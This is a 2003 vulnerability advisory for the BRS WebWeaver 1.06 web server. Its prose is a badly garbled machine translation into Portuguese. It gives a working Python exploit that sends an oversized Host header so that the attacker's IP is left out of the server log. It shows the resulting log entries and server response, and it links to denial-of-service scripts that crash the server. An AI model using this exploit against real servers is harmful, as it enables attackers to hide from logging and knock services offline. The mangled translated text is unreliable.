WebWeaver v1.06 e permite que usuários anonymous naveguem pelo servidor, se o campo Host for definido como longo Input, isto suspeitamente casará diversos ataques denial of services.

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Anonymous Surfing
product: BRS WebWeaver 1.06
vendor: http://www.brswebweaver.com
risk: high
date: 09/24/2k3
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/027_en
http://f0kp.iplus.ru/bz/027_ru
contact email: euronymous at iplus dot ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
0x01. Anonymous surfing
=======================
WebWeaver 1.06 e provavelmente versões anterioras permitirão `anônimas surfando' com
algum truque. Se você solicita o servidor do http com ambiciona `Anfitrião' campo de HTTP
pacote, então o Webweaver dont registra seu IP adrress em registro de servidor:
HTTP Server Started - 24/Sep/2003:18:13:39
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-"
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-"
- - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"HTTP server response:
---------------------
HTTP/1.0 414 Request-URI Too Large
Sever: BRS WebWeaver/1.06
Date: Wed, 24 Sep 2003 14:16:11 GMT
Content-Type: text/html
<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi
s server.</BODY></HTML>Exploit code:
-------------
#! /usr/bin/env python
##
# by euronymous [ http://f0kp.iplus.ru ]
#
# Usage: ./WWanon.py <target_host>
##
import sys, socket
H0ST = sys.argv[1]
BUF = 'fp' * 0x815F
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect((H0ST,80))
f.send('GET / HTTP/1.1\r\n')
f.send('Host: '+BUF+'\n\n')
WWout = f.recv(1024)
f.close
print WWout0x02. Remote crashes again
==========================
Autor do WW esteve incapaz para fixar condições de inundação antecipadas nele crappy proggie, ele
somente está aumentando o tamanho do buffer vulnerável. Portanto, você ainda pode colidir
quaisquer solicitações do WW com façanhas, liberadas mais antecipadas, mas você tem mudar tamanho de
solicite em código de façanha. Usando technik, que mencionou acima, você pode Dos
anonimamente.
Exploit urls:
[1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request.
[2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST0x03. Greetings
===============
Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..

Cracks's S.A
Hosted by www.Geocities.ws

1